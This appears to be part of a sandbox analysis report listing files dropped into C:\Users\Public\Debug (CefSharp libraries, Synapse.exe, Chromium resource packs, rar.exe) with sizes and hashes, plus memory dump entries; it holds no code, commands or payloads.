2e590d0ade2f99fc55aa2f36a1f25be8423d5dbb9879f238f433bfb5417ddf9b

SHA512
37a98683ce34eb545e08999905e395c357592eda75b8ae8c06c4f32bf6bec532775e63ac94bdcc54c3ca8eedc60f7eed5a5cbc8fe306545f7138b1d411e47c65

Download Submit
C:\Users\Public\Debug\CefSharp.Core.dll

Filesize
874KB

MD5
a82e88f4c8aaa6081d8c1b222bc611d9

SHA1
900e4adcf3bf588b5dc910b52ea71c0b3aecb413

SHA256
0c1f3a0aecca26de8da4e89697166abb4b61c88c0aea66da9525e43d07492cb2

SHA512
dc06302deb28d956fe77ecc8225f85c4a0a83456f7af49e3041d2531340855f0f5b45b0d90399a22e577cb12fcc144bc2eb84a96cee9610ffefec7f82d9efd8e

Download Submit
C:\Users\Public\Debug\CefSharp.WinForms.dll

Filesize
52KB

MD5
4dca3938c36e355203030cc587fb49f4

SHA1
c09a2b4b3d8dc3cc8ec8b06efbb082e848272add

SHA256
ebc705b93e3139f44b2d6fcb47b15d8a5f3239cf7a3c632d3c887b7e0a679970

SHA512
33572c78207fbf4fb89165e973d582c1e611b329e878da5c7575c5e93330e04f22489647c50fc1e13376500d60029c6322ef67c5eef7fdd2a223a0f2adaafa1e

Download Submit
C:\Users\Public\Debug\CefSharp.dll

Filesize
271KB

MD5
adbd8186e51aca66df69ac1044059a25

SHA1
f642e58fe4b126f5d72f909e9b8c43e60b5f1a07

SHA256
a532da3e58fa66f4b73f1202fc5f3be1bc57673edb2a8433527d9c9a2257ac29

SHA512
3eed50c04858a824e015d2f84f6e1e85cf2deeb184f387857203d0597a6b83bf611dd11b19fb6ea11d8f30ed6c3dcda78fdbde95b32585ee2cd9040da505f671

Download Submit
C:\Users\Public\Debug\Guna.UI2.dll

Filesize
2.1MB

MD5
c19e9e6a4bc1b668d19505a0437e7f7e

SHA1
73be712aef4baa6e9dabfc237b5c039f62a847fa

SHA256
9ac8b65e5c13292a8e564187c1e7446adc4230228b669383bd7b07035ab99a82

SHA512
b6cd0af436459f35a97db2d928120c53d3691533b01e4f0e8b382f2bd81d9a9a2c57e5e2aa6ade9d6a1746d5c4b2ef6c88d3a0cf519424b34445d0d30aab61de

Download Submit
C:\Users\Public\Debug\Monaco\vs\basic-languages\lua\autocompletes\services\CacheableContentProvider.js

Filesize
180B

MD5
86f71cf992f88d56b09b91a1ceea50d0

SHA1
1bc621b6362f0002a43590080ad77acc7e5fae46

SHA256
79b3de348b89cddaf7b0c89c8a5ef66bf50f655e544744094195c865bc14f3ef

SHA512
225a46eeb6b3556f290ffc34eecaf37e5d81531de6940f241ecb73d5a3ce9bd46f9a9ee1152d506db82d8fdb99c40b8b857567513bf6870a2ea34b928d4d6f6f

Download Submit
C:\Users\Public\Debug\Newtonsoft.Json.dll

Filesize
695KB

MD5
715a1fbee4665e99e859eda667fe8034

SHA1
e13c6e4210043c4976dcdc447ea2b32854f70cc6

SHA256
c5c83bbc1741be6ff4c490c0aee34c162945423ec577c646538b2d21ce13199e

SHA512
bf9744ccb20f8205b2de39dbe79d34497b4d5c19b353d0f95e87ea7ef7fa1784aea87e10efcef11e4c90451eaa47a379204eb0533aa3018e378dd3511ce0e8ad

Download Submit
C:\Users\Public\Debug\Synapse.exe

Filesize
164KB

MD5
9099a83968067cb333a0902c1034b1e2

SHA1
400c50bc1484720fd2b50cb817981209a97790e9

SHA256
7a7627d9e30ec060719f014804eeae0ceb3874c2e3ce929df4b11c93a0684fe6

SHA512
e2a26a9a0ccf2e4151ef2e8276377bcc70136aeafad1cded9f1096f8b423765058e159e6ca3ac36ce39309f14959cc35a621b93426d6fe432587a5d01a6f7cab

Download Submit
C:\Users\Public\Debug\chrome_100_percent.pak

Filesize
723KB

MD5
8769ca49abae6664f018947546577d16

SHA1
26805c113867845a210fba76dc089967f4e28e0e

SHA256
7fe5c8576bdca841ac43598eb50fc872a0f8562e49f831b872bcfba877beeadb

SHA512
feaf9052a72ef519d596214bc5159c0c0b34989a8d36c588c267799fecf5b027f01434e1d574bc78ad007afe213f08b91bdc7b24ba5161363ad002c02d579869

Download Submit
C:\Users\Public\Debug\chrome_200_percent.pak

Filesize
1.1MB

MD5
3b497bbad96f8a9af62fa902060137ec

SHA1
c05d50c38889ea58c0212068586b4a3109146257

SHA256
dee588f6e81c62d0172dab400ee8860d30a619354c5815718e20975c26ee689c

SHA512
c76647be62de62822b3aeb8782c1fe258b4cc1751540ba0f8f1115398af9c931da9c3a7d2bd530209f6ed521ec6f2056330a885d2c465744a93784300cd855fb

Download Submit
C:\Users\Public\Debug\chrome_elf.dll

Filesize
1.0MB

MD5
36ad64b1e51c3ab44975f4da8be687a8

SHA1
89f8a93d381941d276e613eed0809542d24594b4

SHA256
820112bd72cb9125581bedd5dc6c8215edf6bbe8fa6db7fa1377129787ce93cf

SHA512
50fcf258cf7d1eb748b8d978fac64f4338a8c91027f125b470d3064220c6d3f56f51fd2f782f14ebd05a2a25cd7ad7105363df3d90ee85fc94757e60f539d444

Download Submit
C:\Users\Public\Debug\debug.log

Filesize
5KB

MD5
95c7763b27003fcb7d3bbc0ffe485214

SHA1
fe6025b3d7d4c2703efe9244b8e078a10e41e694

SHA256
bd67204c8ba9515cf0219ebb738e38b1fa91ce283feabb7ab2931caaf4488209

SHA512
864f9c114b16670ba05c8c03d297fde046da7e143378e1e40a63599b73d6da83b39eb7d037af3bba11a58de4ff70f23178bd603d0d38be274b5a08f706a75227

Download Submit
C:\Users\Public\Debug\icudtl.dat

Filesize
10.2MB

MD5
e0f1ad85c0933ecce2e003a2c59ae726

SHA1
a8539fc5a233558edfa264a34f7af6187c3f0d4f

SHA256
f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb

SHA512
714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28

Download Submit
C:\Users\Public\Debug\locales\en-US.pak

Filesize
448KB

MD5
80c784194e3d0bcb8f4f459993f0283b

SHA1
d21d0d968893929f568660de78d74ef53a927f2a

SHA256
e0a905b43358850251724911a178637fc94c090403beb05a2036ce084221a799

SHA512
0e78c78726afa7043edb2455faa4f44c15c38375ce81a5a0d5a1761efc2283c025d17ffb68fedaf7fc504dfa4f36dee8fccb3d863d8d2431e1c2f95ead9ca595

Download Submit
C:\Users\Public\Debug\resources.pak

Filesize
7.9MB

MD5
e251388ec150bedf605254f4f6ae8fa9

SHA1
d8717d6fda6446cb43ef3b693f387e3004abf33b

SHA256
97b1242ac21f70b629e198be578907ad7f2306935e5ca3e9239e3ff9bb5e1ba0

SHA512
3705bf3b51beabafdac3580246a26e177237f1ac9252e25619c1a02aa25ee7fcfe6ab1e19a09550fb527a171a5a3461a7b1ec20dcd1fff9c995a93f9c5dcf99a

Download Submit
C:\Users\Public\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
memory/664-10-0x0000020770820000-0x0000020770842000-memory.dmp

Filesize
136KB

Download
memory/2700-53-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

Filesize
8KB

Download
memory/2700-54-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

Filesize
10.8MB

Download
memory/2700-1436-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

Filesize
10.8MB

Download
memory/2700-7-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

Filesize
8KB

Download
memory/2700-8-0x0000000000700000-0x0000000000716000-memory.dmp

Filesize
88KB

Download
memory/2700-9-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

Filesize
10.8MB

Download
memory/3152-1350-0x0000000005ED0000-0x0000000005EDA000-memory.dmp

Filesize
40KB

Download
memory/3152-1395-0x000000000C4E0000-0x000000000C556000-memory.dmp

Filesize
472KB

Download
memory/3152-1348-0x0000000005FA0000-0x0000000006546000-memory.dmp

Filesize
5.6MB

Download
memory/3152-1366-0x0000000009130000-0x000000000917A000-memory.dmp

Filesize
296KB

Download
memory/3152-1347-0x0000000000FD0000-0x0000000001000000-memory.dmp

Filesize
192KB

Download
memory/3152-1370-0x00000000092A0000-0x00000000093FA000-memory.dmp

Filesize
1.4MB

Download
memory/3152-1394-0x000000000C420000-0x000000000C4D2000-memory.dmp

Filesize
712KB

Download
memory/3152-1349-0x0000000005AD0000-0x0000000005B62000-memory.dmp

Filesize
584KB

Download
memory/3152-1354-0x0000000006970000-0x0000000006B84000-memory.dmp

Filesize
2.1MB

Download
memory/3152-1358-0x00000000090C0000-0x00000000090D4000-memory.dmp

Filesize
80KB

Download
memory/3152-1426-0x000000000F2D0000-0x000000000F627000-memory.dmp

Filesize
3.3MB

Download
memory/3152-1362-0x00000000091C0000-0x00000000092A0000-memory.dmp

Filesize
896KB

Download
memory/3152-1424-0x000000000E9B0000-0x000000000E9D2000-memory.dmp

Filesize
136KB

Download
memory/3152-1425-0x000000000EE00000-0x000000000EE1E000-memory.dmp

Filesize
120KB

Download
memory/3168-1399-0x0000000005040000-0x0000000005128000-memory.dmp

Filesize
928KB

Download
memory/3168-1390-0x0000000000750000-0x0000000000758000-memory.dmp

Filesize
32KB

Download